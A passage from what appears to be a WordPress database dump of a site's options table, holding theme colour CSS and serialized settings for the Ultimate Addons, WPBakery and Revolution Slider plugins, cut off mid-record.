.widget_nav_menu .menu,.l-main .widget_nav_menu .menu-item a,.smile-icon-timeline-wrap .timeline-line{border-color:#e5e5e5}blockquote:before,.w-separator.color_border,.w-iconbox.color_light .w-iconbox-icon{color:#e5e5e5}.w-btn.color_light.style_solid,.w-btn.color_light.style_outlined:before,.no-touch .btn_hov_reverse .w-btn.color_light.style_outlined:hover,.w-iconbox.style_circle.color_light .w-iconbox-icon,.no-touch .g-loadmore.type_block .g-loadmore-btn:hover,.no-touch .wpml-ls-sub-menu a:hover{background-color:#e5e5e5}.w-iconbox.style_outlined.color_light .w-iconbox-icon,.w-person-links-item,.w-socials.style_outlined .w-socials-item-link,.pagination .page-numbers{box-shadow:0 0 0 2px #e5e5e5 inset}.w-tabs.layout_trendy .w-tabs-list{box-shadow:0 -1px 0 #e5e5e5 inset}h1, h2, h3, h4, h5, h6,.w-counter.color_heading .w-counter-number{color:#333333}.w-progbar.color_heading .w-progbar-bar-h{background-color:#333333}input,textarea,select,.l-canvas,.l-footer,.l-popup-box-content,.w-form-row-field:before,.w-iconbox.color_light.style_circle .w-iconbox-icon,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h,.bbpress .button,.select2-dropdown{color:#333333}.w-btn.color_contrast.style_outlined,.no-touch .btn_hov_reverse .w-btn.color_contrast.style_solid:hover{color:#333333 !important}.w-btn.color_contrast.style_solid,.w-btn.color_contrast.style_outlined:before,.no-touch .btn_hov_reverse .w-btn.color_contrast.style_outlined:hover,.w-iconbox.style_circle.color_contrast .w-iconbox-icon,.w-progbar.color_text .w-progbar-bar-h,.w-scroller-dot span{background-color:#333333}.w-btn.color_contrast{border-color:#333333}.w-iconbox.style_outlined.color_contrast .w-iconbox-icon{box-shadow:0 0 0 2px #333333 inset}.w-scroller-dot span{box-shadow:0 0 0 2px #333333}a{color:#324889}.no-touch a:hover,.no-touch .tablepress .sorting:hover{color:#004e7a}.highlight_primary,.g-preloader,.l-main .w-contacts-item:before,.w-counter.color_primary .w-counter-number,.g-filters.style_1 .g-filters-item.active,.g-filters.style_3 .g-filters-item.active,.w-form-row.focused .w-form-row-field:before,.w-iconbox.color_primary .w-iconbox-icon,.w-separator.color_primary,.w-sharing.type_outlined.color_primary .w-sharing-item,.no-touch .w-sharing.type_simple.color_primary .w-sharing-item:hover .w-sharing-icon,.w-tabs.layout_default .w-tabs-item.active,.w-tabs.layout_trendy .w-tabs-item.active,.w-tabs.layout_ver .w-tabs-item.active,.w-tabs-section.active .w-tabs-section-header,.tablepress .sorting_asc,.tablepress .sorting_desc,.no-touch .owl-prev:hover,.no-touch .owl-next:hover{color:#324889}.w-btn.color_primary.style_outlined,.no-touch .btn_hov_reverse .w-btn.color_primary.style_solid:hover{color:#324889 !important}.l-section.color_primary,.l-titlebar.color_primary,.no-touch .l-navigation-item:hover .l-navigation-item-arrow,.highlight_primary_bg,.w-actionbox.color_primary,button[type=\"submit\"]:not(.w-btn),input[type=\"submit\"],.w-btn.color_primary.style_solid,.w-btn.color_primary.style_outlined:before,.no-touch .btn_hov_reverse .w-btn.color_primary.style_outlined:hover,.w-form-row.for_checkbox label>input:checked + i,.no-touch .g-filters.style_1 .g-filters-item:hover,.no-touch .g-filters.style_2 .g-filters-item:hover,.w-grid-item-placeholder,.w-grid-item-elm.post_taxonomy.style_badge a,.w-iconbox.style_circle.color_primary .w-iconbox-icon,.no-touch .w-iconbox.style_circle .w-iconbox-icon:before,.no-touch .w-iconbox.style_outlined .w-iconbox-icon:before,.no-touch .w-person-links-item:before,.w-pricing-item.type_featured .w-pricing-item-header,.w-progbar.color_primary .w-progbar-bar-h,.w-sharing.type_solid.color_primary .w-sharing-item,.w-sharing.type_fixed.color_primary .w-sharing-item,.w-sharing.type_outlined.color_primary .w-sharing-item:before,.w-socials-item-link-hover,.w-tabs.layout_modern .w-tabs-list,.w-tabs.layout_trendy .w-tabs-item:after,.w-tabs.layout_timeline .w-tabs-item:before,.w-tabs.layout_timeline .w-tabs-section-header-h:before,.no-touch .w-header-show:hover,.no-touch .w-toplink.active:hover,.no-touch .pagination .page-numbers:before,.pagination .page-numbers.current,.l-main .widget_nav_menu .menu-item.current-menu-item>a,.rsThumb.rsNavSelected,.no-touch .tp-leftarrow.custom:before,.no-touch .tp-rightarrow.custom:before,.smile-icon-timeline-wrap .timeline-separator-text .sep-text,.smile-icon-timeline-wrap .timeline-wrapper .timeline-dot,.smile-icon-timeline-wrap .timeline-feature-item .timeline-dot,.select2-results__option--highlighted,.l-body .cl-btn{background-color:#324889}.w-btn.color_primary,.no-touch .owl-prev:hover,.no-touch .owl-next:hover,.no-touch .w-logos.style_1 .w-logos-item:hover,.w-tabs.layout_default .w-tabs-item.active,.w-tabs.layout_ver .w-tabs-item.active,.owl-dot.active span,.rsBullet.rsNavSelected span,.tp-bullets.custom .tp-bullet{border-color:#324889}.l-main .w-contacts-item:before,.w-iconbox.color_primary.style_outlined .w-iconbox-icon,.w-sharing.type_outlined.color_primary .w-sharing-item,.w-tabs.layout_timeline .w-tabs-item,.w-tabs.layout_timeline .w-tabs-section-header-h{box-shadow:0 0 0 2px #324889 inset}input:focus,textarea:focus,select:focus,.select2-container--focus .select2-selection{box-shadow:0 0 0 2px #324889}.no-touch .w-blognav-item:hover .w-blognav-title,.w-counter.color_secondary .w-counter-number,.w-iconbox.color_secondary .w-iconbox-icon,.w-separator.color_secondary,.w-sharing.type_outlined.color_secondary .w-sharing-item,.no-touch .w-sharing.type_simple.color_secondary .w-sharing-item:hover .w-sharing-icon,.highlight_secondary{color:#004e7a}.w-btn.color_secondary.style_outlined,.no-touch .btn_hov_reverse .w-btn.color_secondary.style_solid:hover{color:#004e7a !important}.l-section.color_secondary,.l-titlebar.color_secondary,.no-touch .w-grid-item-elm.post_taxonomy.style_badge a:hover,.no-touch .l-section.preview_trendy .w-blogpost-meta-category a:hover,.no-touch body:not(.btn_hov_none) .button:hover,.no-touch body:not(.btn_hov_none) button[type=\"submit\"]:not(.w-btn):hover,.no-touch body:not(.btn_hov_none) input[type=\"submit\"]:hover,.w-btn.color_secondary.style_solid,.w-btn.color_secondary.style_outlined:before,.no-touch .btn_hov_reverse .w-btn.color_secondary.style_outlined:hover,.w-actionbox.color_secondary,.w-iconbox.style_circle.color_secondary .w-iconbox-icon,.w-progbar.color_secondary .w-progbar-bar-h,.w-sharing.type_solid.color_secondary .w-sharing-item,.w-sharing.type_fixed.color_secondary .w-sharing-item,.w-sharing.type_outlined.color_secondary .w-sharing-item:before,.highlight_secondary_bg{background-color:#004e7a}.w-btn.color_secondary{border-color:#004e7a}.w-iconbox.color_secondary.style_outlined .w-iconbox-icon,.w-sharing.type_outlined.color_secondary .w-sharing-item{box-shadow:0 0 0 2px #004e7a inset}.l-main .w-author-url,.l-main .w-blogpost-meta>*,.l-main .w-profile-link.for_logout,.l-main .widget_tag_cloud,.highlight_faded{color:#999999}.l-section.color_alternate,.l-titlebar.color_alternate,.color_alternate .g-filters.style_1 .g-filters-item.active,.color_alternate .w-tabs.layout_default .w-tabs-item.active,.no-touch .color_alternate .w-tabs.layout_default .w-tabs-item.active:hover,.color_alternate .w-tabs.layout_ver .w-tabs-item.active,.no-touch .color_alternate .w-tabs.layout_ver .w-tabs-item.active:hover,.color_alternate .w-tabs.layout_timeline .w-tabs-item,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h{background-color:#f2f2f2}.color_alternate .w-iconbox.style_circle.color_contrast .w-iconbox-icon{color:#f2f2f2}.color_alternate .w-btn.color_contrast.style_solid,.no-touch .btn_hov_fade .color_alternate .w-btn.color_contrast.style_outlined:hover,.no-touch .btn_hov_slide .color_alternate .w-btn.color_contrast.style_outlined:hover,.no-touch .btn_hov_reverse .color_alternate .w-btn.color_contrast.style_outlined:hover{color:#f2f2f2 !important}.color_alternate .w-tabs.layout_modern .w-tabs-item:after{border-bottom-color:#f2f2f2}.color_alternate input,.color_alternate textarea,.color_alternate select,.color_alternate .g-filters.style_1,.color_alternate .g-filters.style_2 .g-filters-item.active,.color_alternate .w-grid-none,.color_alternate .w-iconbox.style_circle.color_light .w-iconbox-icon,.color_alternate .g-loadmore.type_block .g-loadmore-btn,.color_alternate .w-pricing-item-header,.color_alternate .w-progbar-bar,.color_alternate .w-socials.style_solid .w-socials-item-link,.color_alternate .w-tabs.layout_default .w-tabs-list,.color_alternate .wp-caption-text,.color_alternate .ginput_container_creditcard{background-color:#ffffff}.l-section.color_alternate,.l-section.color_alternate *,.l-section.color_alternate .w-btn.color_light{border-color:#dddddd}.color_alternate .w-separator.color_border,.color_alternate .w-iconbox.color_light .w-iconbox-icon{color:#dddddd}.color_alternate .w-btn.color_light.style_solid,.color_alternate .w-btn.color_light.style_outlined:before,.no-touch .btn_hov_reverse .color_alternate .w-btn.color_light.style_outlined:hover,.color_alternate .w-iconbox.style_circle.color_light .w-iconbox-icon,.no-touch .color_alternate .g-loadmore.type_block .g-loadmore-btn:hover{background-color:#dddddd}.color_alternate .w-iconbox.style_outlined.color_light .w-iconbox-icon,.color_alternate .w-person-links-item,.color_alternate .w-socials.style_outlined .w-socials-item-link,.color_alternate .pagination .page-numbers{box-shadow:0 0 0 2px #dddddd inset}.color_alternate .w-tabs.layout_trendy .w-tabs-list{box-shadow:0 -1px 0 #dddddd inset}.l-titlebar.color_alternate h1,.l-section.color_alternate h1,.l-section.color_alternate h2,.l-section.color_alternate h3,.l-section.color_alternate h4,.l-section.color_alternate h5,.l-section.color_alternate h6,.l-section.color_alternate .w-counter-number{color:#333333}.color_alternate .w-progbar.color_contrast .w-progbar-bar-h{background-color:#333333}.l-titlebar.color_alternate,.l-section.color_alternate,.color_alternate input,.color_alternate textarea,.color_alternate select,.color_alternate .w-iconbox.color_contrast .w-iconbox-icon,.color_alternate .w-iconbox.color_light.style_circle .w-iconbox-icon,.color_alternate .w-tabs.layout_timeline .w-tabs-item,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h{color:#333333}.color_alternate .w-btn.color_contrast.style_outlined,.no-touch .btn_hov_reverse .color_alternate .w-btn.color_contrast.style_solid:hover{color:#333333 !important}.color_alternate .w-btn.color_contrast.style_solid,.color_alternate .w-btn.color_contrast.style_outlined:before,.no-touch .btn_hov_reverse .color_alternate .w-btn.color_contrast.style_outlined:hover,.color_alternate .w-iconbox.style_circle.color_contrast .w-iconbox-icon{background-color:#333333}.color_alternate .w-btn.color_contrast{border-color:#333333}.color_alternate .w-iconbox.style_outlined.color_contrast .w-iconbox-icon{box-shadow:0 0 0 2px #333333 inset}.color_alternate a{color:#324889}.no-touch .color_alternate a:hover{color:#004e7a}.color_alternate .highlight_primary,.l-main .color_alternate .w-contacts-item:before,.color_alternate .w-counter.color_primary .w-counter-number,.color_alternate .g-preloader,.color_alternate .g-filters.style_1 .g-filters-item.active,.color_alternate .g-filters.style_3 .g-filters-item.active,.color_alternate .w-form-row.focused .w-form-row-field:before,.color_alternate .w-iconbox.color_primary .w-iconbox-icon,.no-touch .color_alternate .owl-prev:hover,.no-touch .color_alternate .owl-next:hover,.color_alternate .w-separator.color_primary,.color_alternate .w-tabs.layout_default .w-tabs-item.active,.color_alternate .w-tabs.layout_trendy .w-tabs-item.active,.color_alternate .w-tabs.layout_ver .w-tabs-item.active,.color_alternate .w-tabs-section.active .w-tabs-section-header{color:#324889}.color_alternate .w-btn.color_primary.style_outlined,.no-touch .btn_hov_reverse .color_alternate .w-btn.color_primary.style_solid:hover{color:#324889 !important}.color_alternate .highlight_primary_bg,.color_alternate .w-actionbox.color_primary,.color_alternate .w-btn.color_primary.style_solid,.color_alternate .w-btn.color_primary.style_outlined:before,.no-touch .btn_hov_reverse .color_alternate .w-btn.color_primary.style_outlined:hover,.no-touch .color_alternate .g-filters.style_1 .g-filters-item:hover,.no-touch .color_alternate .g-filters.style_2 .g-filters-item:hover,.color_alternate .w-iconbox.style_circle.color_primary .w-iconbox-icon,.no-touch .color_alternate .w-iconbox.style_circle .w-iconbox-icon:before,.no-touch .color_alternate .w-iconbox.style_outlined .w-iconbox-icon:before,.color_alternate .w-pricing-item.type_featured .w-pricing-item-header,.color_alternate .w-progbar.color_primary .w-progbar-bar-h,.color_alternate .w-tabs.layout_modern .w-tabs-list,.color_alternate .w-tabs.layout_trendy .w-tabs-item:after,.color_alternate .w-tabs.layout_timeline .w-tabs-item:before,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h:before,.no-touch .color_alternate .pagination .page-numbers:before,.color_alternate .pagination .page-numbers.current{background-color:#324889}.color_alternate .w-btn.color_primary,.no-touch .color_alternate .owl-prev:hover,.no-touch .color_alternate .owl-next:hover,.no-touch .color_alternate .w-logos.style_1 .w-logos-item:hover,.color_alternate .w-tabs.layout_default .w-tabs-item.active,.color_alternate .w-tabs.layout_ver .w-tabs-item.active,.no-touch .color_alternate .w-tabs.layout_default .w-tabs-item.active:hover,.no-touch .color_alternate .w-tabs.layout_ver .w-tabs-item.active:hover{border-color:#324889}.l-main .color_alternate .w-contacts-item:before,.color_alternate .w-iconbox.color_primary.style_outlined .w-iconbox-icon,.color_alternate .w-tabs.layout_timeline .w-tabs-item,.color_alternate .w-tabs.layout_timeline .w-tabs-section-header-h{box-shadow:0 0 0 2px #324889 inset}.color_alternate input:focus,.color_alternate textarea:focus,.color_alternate select:focus{box-shadow:0 0 0 2px #324889}.color_alternate .highlight_secondary,.color_alternate .w-counter.color_secondary .w-counter-number,.color_alternate .w-iconbox.color_secondary .w-iconbox-icon,.color_alternate .w-separator.color_secondary{color:#004e7a}.color_alternate .w-btn.color_secondary.style_outlined,.no-touch .btn_hov_reverse .color_alternate .w-btn.color_secondary.style_solid:hover{color:#004e7a !important}.color_alternate .highlight_secondary_bg,.color_alternate .w-btn.color_secondary.style_solid,.color_alternate .w-btn.color_secondary.style_outlined:before,.no-touch .btn_hov_reverse .color_alternate .w-btn.color_secondary.style_outlined:hover,.color_alternate .w-actionbox.color_secondary,.color_alternate .w-iconbox.style_circle.color_secondary .w-iconbox-icon,.color_alternate .w-progbar.color_secondary .w-progbar-bar-h{background-color:#004e7a}.color_alternate .w-btn.color_secondary{border-color:#004e7a}.color_alternate .w-iconbox.color_secondary.style_outlined .w-iconbox-icon{box-shadow:0 0 0 2px #004e7a inset}.color_alternate .highlight_faded,.color_alternate .w-profile-link.for_logout{color:#999999}.color_footer-top{background-color:#333333}.color_footer-top input,.color_footer-top textarea,.color_footer-top select,.color_footer-top .g-loadmore.type_block .g-loadmore-btn,.color_footer-top .w-socials.style_solid .w-socials-item-link{background-color:#292929}.color_footer-top,.color_footer-top *,.color_footer-top .w-btn.color_light{border-color:#444444}.color_footer-top .w-btn.color_light.style_solid,.color_footer-top .w-btn.color_light.style_outlined:before,.no-touch .color_footer-top .g-loadmore.type_block .g-loadmore-btn:hover{background-color:#444444}.color_footer-top .w-separator.color_border{color:#444444}.color_footer-top .w-socials.style_outlined .w-socials-item-link{box-shadow:0 0 0 2px #444444 inset}.color_footer-top,.color_footer-top input,.color_footer-top textarea,.color_footer-top select{color:#999999}.color_footer-top a{color:#e5e5e5}.no-touch .color_footer-top a:hover,.no-touch .color_footer-top .w-form-row.focused .w-form-row-field:before{color:#324889}.color_footer-top input:focus,.color_footer-top textarea:focus,.color_footer-top select:focus{box-shadow:0 0 0 2px #324889}.color_footer-bottom{background-color:#ffffff}.color_footer-bottom input,.color_footer-bottom textarea,.color_footer-bottom select,.color_footer-bottom .g-loadmore.type_block .g-loadmore-btn,.color_footer-bottom .w-socials.style_solid .w-socials-item-link{background-color:#f2f2f2}.color_footer-bottom,.color_footer-bottom *,.color_footer-bottom .w-btn.color_light{border-color:#e5e5e5}.color_footer-bottom .w-btn.color_light.style_solid,.color_footer-bottom .w-btn.color_light.style_outlined:before,.no-touch .color_footer-bottom .g-loadmore.type_block .g-loadmore-btn:hover{background-color:#e5e5e5}.color_footer-bottom .w-separator.color_border{color:#e5e5e5}.color_footer-bottom .w-socials.style_outlined .w-socials-item-link{box-shadow:0 0 0 2px #e5e5e5 inset}.color_footer-bottom,.color_footer-bottom input,.color_footer-bottom textarea,.color_footer-bottom select{color:#777777}.color_footer-bottom a{color:#324889}.no-touch .color_footer-bottom a:hover,.no-touch .color_footer-bottom .w-form-row.focused .w-form-row-field:before{color:#004e7a}.color_footer-bottom input:focus,.color_footer-bottom textarea:focus,.color_footer-bottom select:focus{box-shadow:0 0 0 2px #004e7a}', 'yes'),
(164, 'brainstrom_products', 'a:1:{s:7:\"plugins\";a:1:{i:6892199;a:17:{s:8:\"template\";s:41:\"Ultimate_VC_Addons/Ultimate_VC_Addons.php\";s:6:\"remote\";s:6:\"3.19.6\";s:7:\"version\";s:7:\"3.16.24\";s:12:\"purchase_key\";s:0:\"\";s:6:\"status\";s:14:\"not-registered\";s:7:\"message\";s:0:\"\";s:4:\"type\";s:6:\"plugin\";s:2:\"id\";s:7:\"6892199\";s:12:\"product_name\";s:41:\"Ultimate Addons for WPBakery Page Builder\";s:8:\"in_house\";s:4:\"true\";s:9:\"on_market\";s:4:\"true\";s:15:\"is_product_free\";s:5:\"false\";s:10:\"short_name\";s:0:\"\";s:13:\"changelog_url\";s:46:\"http://changelog.brainstormforce.com/ultimate/\";s:12:\"purchase_url\";s:74:\"https://codecanyon.net/cart/add_items?item_ids=6892199&ref=BrainstormForce\";s:12:\"version_beta\";s:0:\"\";s:17:\"download_url_beta\";s:0:\"\";}}}', 'yes'),
(165, 'bsf_force_check_extensions', '', 'no'),
(166, 'ultimate_updater', 'disabled', 'yes'),
(169, 'ultimate_row', 'enable', 'yes'),
(170, 'ultimate_animation', 'disable', 'yes'),
(171, 'ultimate_google_fonts', 'a:0:{}', 'yes'),
(172, 'ultimate_selected_google_fonts', 'a:0:{}', 'yes'),
(173, 'vc_version', '6.1', 'yes'),
(174, 'bsf_local_transient', '1597806688', 'yes'),
(177, 'bsf-updater-version', '1.22.44\r\n', 'yes'),
(179, 'bsf_local_transient_bundled', '1596818904', 'yes'),
(182, 'brainstrom_bundled_products', 'a:0:{}', 'yes'),
(183, 'bsf_skip_braisntorm_menu', '1', 'no'),
(184, 'ultimate_constants', 'a:3:{s:24:\"ULTIMATE_NO_UPDATE_CHECK\";b:0;s:28:\"ULTIMATE_NO_EDIT_PAGE_NOTICE\";b:1;s:30:\"ULTIMATE_NO_PLUGIN_PAGE_NOTICE\";b:1;}', 'yes'),
(185, 'ultimate_modules', 'a:41:{i:0;s:18:\"ultimate_animation\";i:1;s:16:\"ultimate_buttons\";i:2;s:18:\"ultimate_countdown\";i:3;s:17:\"ultimate_flip_box\";i:4;s:20:\"ultimate_google_maps\";i:5;s:22:\"ultimate_google_trends\";i:6;s:17:\"ultimate_headings\";i:7;s:22:\"ultimate_icon_timeline\";i:8;s:17:\"ultimate_info_box\";i:9;s:20:\"ultimate_info_circle\";i:10;s:18:\"ultimate_info_list\";i:11;s:20:\"ultimate_info_tables\";i:12;s:28:\"ultimate_interactive_banners\";i:13;s:29:\"ultimate_interactive_banner_2\";i:14;s:15:\"ultimate_modals\";i:15;s:17:\"ultimate_parallax\";i:16;s:23:\"ultimate_pricing_tables\";i:17;s:15:\"ultimate_spacer\";i:18;s:22:\"ultimate_stats_counter\";i:19;s:20:\"ultimate_swatch_book\";i:20;s:14:\"ultimate_icons\";i:21;s:18:\"ultimate_list_icon\";i:22;s:17:\"ultimate_carousel\";i:23;s:18:\"ultimate_fancytext\";i:24;s:22:\"ultimate_highlight_box\";i:25;s:20:\"ultimate_info_banner\";i:26;s:15:\"ultimate_ihover\";i:27;s:16:\"ultimate_hotspot\";i:28;s:21:\"ultimate_video_banner\";i:29;s:11:\"woocomposer\";i:30;s:20:\"ultimate_dual_button\";i:31;s:13:\"ultimate_link\";i:32;s:19:\"ultimate_fancy_text\";i:33;s:23:\"ultimate_hightlight_box\";i:34;s:20:\"ultimate_content_box\";i:35;s:24:\"ultimate_image_separator\";i:36;s:27:\"ultimate_expandable_section\";i:37;s:12:\"ultimate_tab\";i:38;s:23:\"ultimate_sticky_section\";i:39;s:13:\"ultimate_team\";i:40;s:21:\"ultimate_range_slider\";}', 'yes'),
(186, 'smile_fonts', 'a:1:{s:8:\"Defaults\";a:4:{s:7:\"include\";s:20:\"smile_fonts/Defaults\";s:6:\"folder\";s:20:\"smile_fonts/Defaults\";s:5:\"style\";s:21:\"Defaults/Defaults.css\";s:6:\"config\";s:11:\"charmap.php\";}}', 'yes'),
(187, 'revslider_servers', 'a:7:{i:0;s:22:\"themepunch-ext-b.tools\";i:1;s:16:\"themepunch.tools\";i:2;s:22:\"themepunch-ext-a.tools\";i:3;s:22:\"themepunch-ext-a.tools\";i:4;s:22:\"themepunch-ext-a.tools\";i:5;s:22:\"themepunch-ext-b.tools\";i:6;s:22:\"themepunch-ext-b.tools\";}', 'yes'),
(188, 'revslider_server_refresh', '1596785810', 'yes'),
(189, 'revslider-update-check-short', '1596894115', 'yes'),
(190, 'revslider-templates-check', '1596721232', 'yes'),
(194, 'revslider-library-check', '1596289314', 'yes'),
(195, 'revslider_checktables', '1', 'yes'),
(196, 'rs_tables_created', '1', 'yes'),
(198, 'revslider_table_version', '1.0.6', 'yes'),
(199, 'revslider-global-settings', 'a:0:{}', 'yes'),
(202, 'revslider_update_version', '5.2.5.5', 'yes'),
(203, 'revslider-valid-notice', 'false', 'yes'),
(204, 'widget_rev-slider-widget', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(210, 'us_testimonial_category_children', 'a:0:{}', 'yes'),
(214, 'us_widget_areas', 'a:2:{s:9:\"sidebar-8\";s:3:\"FAQ\";s:9:\"sidebar-9\";s:5:\"Login\";}', 'yes'),
(219, 'new_admin_email', 'markavincim@gmail.com', 'yes');
INSERT INTO `zdenl_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(232, 'usof_style_schemes_Impreza', 'a:1:{i:1;a:2:{s:5:\"title\";s:6:\"zedent\";s:6:\"values\";a:62:{s:13:\"color_body_bg\";s:7:\"#eeeeee\";s:22:\"color_header_middle_bg\";s:7:\"#ffffff\";s:24:\"color_header_middle_text\";s:7:\"#333333\";s:30:\"color_header_middle_text_hover\";s:7:\"#096fb6\";s:20:\"color_chrome_toolbar\";s:7:\"#f5f5f5\";s:19:\"color_header_top_bg\";s:7:\"#f5f5f5\";s:21:\"color_header_top_text\";s:7:\"#777777\";s:27:\"color_header_top_text_hover\";s:7:\"#096fb6\";s:22:\"color_header_bottom_bg\";s:7:\"#f5f5f5\";s:24:\"color_header_bottom_text\";s:7:\"#777777\";s:30:\"color_header_bottom_text_hover\";s:7:\"#096fb6\";s:29:\"color_header_transparent_text\";s:7:\"#ffffff\";s:35:\"color_header_transparent_text_hover\";s:7:\"#ffffff\";s:22:\"color_header_search_bg\";s:7:\"#ffffff\";s:24:\"color_header_search_text\";s:7:\"#096fb6\";s:34:\"color_menu_transparent_active_text\";s:7:\"#096fb6\";s:19:\"color_menu_hover_bg\";s:7:\"#096fb6\";s:21:\"color_menu_hover_text\";s:7:\"#ffffff\";s:20:\"color_menu_active_bg\";s:11:\"transparent\";s:22:\"color_menu_active_text\";s:7:\"#096fb6\";s:20:\"color_menu_button_bg\";s:7:\"#096fb6\";s:22:\"color_menu_button_text\";s:7:\"#ffffff\";s:26:\"color_menu_button_hover_bg\";s:7:\"#1487ca\";s:28:\"color_menu_button_hover_text\";s:7:\"#ffffff\";s:13:\"color_drop_bg\";s:7:\"#096fb6\";s:15:\"color_drop_text\";s:7:\"#ffffff\";s:19:\"color_drop_hover_bg\";s:7:\"#ffffff\";s:21:\"color_drop_hover_text\";s:7:\"#096fb6\";s:20:\"color_drop_active_bg\";s:7:\"#1487ca\";s:22:\"color_drop_active_text\";s:7:\"#ffffff\";s:16:\"color_content_bg\";s:7:\"#ffffff\";s:20:\"color_content_bg_alt\";s:7:\"#f2f2f2\";s:20:\"color_content_border\";s:7:\"#e5e5e5\";s:21:\"color_content_heading\";s:7:\"#333333\";s:18:\"color_content_text\";s:7:\"#333333\";s:18:\"color_content_link\";s:7:\"#096fb6\";s:24:\"color_content_link_hover\";s:7:\"#004e7a\";s:21:\"color_content_primary\";s:7:\"#096fb6\";s:23:\"color_content_secondary\";s:7:\"#004e7a\";s:19:\"color_content_faded\";s:7:\"#999999\";s:20:\"color_alt_content_bg\";s:7:\"#f2f2f2\";s:24:\"color_alt_content_bg_alt\";s:7:\"#ffffff\";s:24:\"color_alt_content_border\";s:7:\"#dddddd\";s:25:\"color_alt_content_heading\";s:7:\"#333333\";s:22:\"color_alt_content_text\";s:7:\"#333333\";s:22:\"color_alt_content_link\";s:7:\"#096fb6\";s:28:\"color_alt_content_link_hover\";s:7:\"#004e7a\";s:25:\"color_alt_content_primary\";s:7:\"#096fb6\";s:27:\"color_alt_content_secondary\";s:7:\"#004e7a\";s:23:\"color_alt_content_faded\";s:7:\"#999999\";s:18:\"color_subfooter_bg\";s:7:\"#333333\";s:22:\"color_subfooter_bg_alt\";s:7:\"#292929\";s:22:\"color_subfooter_border\";s:7:\"#444444\";s:20:\"color_subfooter_text\";s:7:\"#999999\";s:20:\"color_subfooter_link\";s:7:\"#e5e5e5\";s:26:\"color_subfooter_link_hover\";s:7:\"#096fb6\";s:15:\"color_footer_bg\";s:7:\"#ffffff\";s:19:\"color_footer_bg_alt\";s:7:\"#f2f2f2\";s:19:\"color_footer_border\";s:7:\"#e5e5e5\";s:17:\"color_footer_text\";s:7:\"#777777\";s:17:\"color_footer_link\";s:7:\"#096fb6\";s:23:\"color_footer_link_hover\";s:7:\"#004e7a\";}}}', 'yes'),
(238, 'nav_menu_options', 'a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}', 'yes'),
(261, 'category_children', 'a:0:{}', 'yes'),
(311, 'wpb_js_templates', 'a:1:{s:26:\"anlasmali-kurum_1179553283\";a:2:{s:4:\"name\";s:17:\"anlaşmalı kurum\";s:8:\"template\";s:451:\"[vc_row][vc_column][us_logos with_indents=\"1\" img_size=\"full\" carousel_dots=\"1\" carousel_center=\"1\" carousel_autoplay=\"1\" carousel_interval=\"2\" breakpoint_1_autoplay=\"1\" breakpoint_2_autoplay=\"1\" breakpoint_3_autoplay=\"1\" items=\"%5B%7B%22image%22%3A%226292%22%7D%2C%7B%22image%22%3A%226294%22%7D%2C%7B%22image%22%3A%226291%22%7D%2C%7B%22image%22%3A%226295%22%7D%2C%7B%22image%22%3A%226293%22%2C%22link%22%3A%22%7C%7C%7C%22%7D%5D\"][/vc_column][/vc_row]\";}}', 'no'),
(326, 'us_portfolio_category_children', 'a:0:{}', 'yes'),
(339, 'revslider-connection', '1', 'yes'),
(340, 'revslider-latest-version', '6.2.17', 'yes'),
(341, 'revslider-stable-version', '4.2', 'yes'),
(342, 'revslider-notices', 'a:0:{}', 'yes'),
(343, 'revslider-dashboard', 'a:0:{}', 'yes'),
(344, 'revslider-addons', 'O:8:\"stdClass\":26:{s:26:\"revslider-whiteboard-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:26:\"revslider-whiteboard-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Whiteboard\";s:6:\"line_1\";s:31:\"Create Hand-Drawn Presentations\";s:6:\"line_2\";s:45:\"that are understandable, memorable & engaging\";s:9:\"available\";s:5:\"1.0.6\";s:10:\"background\";s:81:\"//updates.themepunch-ext-b.tools/revslider/addons/images/whiteboard_widget_bg.jpg\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_whiteboard.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WB\";}}s:22:\"revslider-backup-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:22:\"revslider-backup-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Backup\";s:6:\"line_1\";s:12:\"Make Backups\";s:6:\"line_2\";s:25:\"Revisions for your safety\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_backup.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BU\";}}s:23:\"revslider-gallery-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-gallery-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"WordPress Gallery\";s:6:\"line_1\";s:31:\"Replace the standard WP Gallery\";s:6:\"line_2\";s:31:\"with the Sliders of your choice\";s:9:\"available\";s:5:\"1.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wpgallery.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"GA\";}}s:25:\"revslider-rel-posts-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-rel-posts-addon\";s:12:\"version_from\";s:7:\"5.2.4.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Related Posts\";s:6:\"line_1\";s:25:\"Add related Posts Sliders\";s:6:\"line_2\";s:31:\"at the end of your post 